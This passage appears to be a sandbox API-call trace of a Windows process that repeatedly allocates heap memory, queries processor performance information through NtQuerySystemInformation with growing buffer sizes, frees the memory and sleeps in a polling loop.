hHeap=0x2560000) returned 1 [0245.609] Sleep (dwMilliseconds=0x110) [0245.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0245.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0245.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0245.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0245.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0245.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0245.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0245.676] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0245.677] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.678] Sleep (dwMilliseconds=0x110) [0245.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0245.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0245.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0245.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0245.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0245.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0245.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0245.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0245.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.738] Sleep (dwMilliseconds=0x110) [0245.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0245.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0245.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0245.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0245.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0245.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0245.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0245.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0245.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.800] Sleep (dwMilliseconds=0x110) [0245.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0245.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0245.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0245.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0245.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0245.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0245.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0245.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0245.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.863] Sleep (dwMilliseconds=0x110) [0245.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0245.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0245.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0245.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0245.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0245.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0245.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0245.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.913] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0245.913] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.913] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.913] Sleep (dwMilliseconds=0x110) [0245.919] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0245.919] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.919] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0245.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0245.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0245.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0245.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0245.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0245.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0245.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.927] Sleep (dwMilliseconds=0x110) [0246.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0246.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0246.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0246.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0246.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0246.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0246.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0246.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0246.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0246.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0246.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0246.049] Sleep (dwMilliseconds=0x110) [0246.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0246.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0246.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0246.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0246.198] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0246.198] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.199] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0246.199] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0246.199] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0246.199] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0246.199] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0246.200] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0246.201] Sleep (dwMilliseconds=0x110) [0246.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0246.404] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0246.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0246.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0246.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0246.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0246.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0246.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0246.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0246.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0246.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0246.406] Sleep (dwMilliseconds=0x110) [0246.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0246.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0246.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0246.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0246.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0246.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0246.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0246.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0246.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0246.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0246.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0246.533] Sleep (dwMilliseconds=0x110) [0246.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0246.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0246.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0246.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0246.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0246.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0246.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0246.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0246.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0246.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0246.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0246.614] Sleep (dwMilliseconds=0x110) [0246.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0246.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0246.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0246.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0246.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0246.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0246.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0246.708] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0246.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0246.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0246.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0246.709] Sleep (dwMilliseconds=0x110) [0246.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0246.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0246.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0246.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0246.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0246.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0246.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0246.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0246.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0246.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0246.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0246.782] Sleep (dwMilliseconds=0x110) [0246.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0246.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0246.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0246.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0246.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0246.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0246.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0246.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0246.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0246.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: 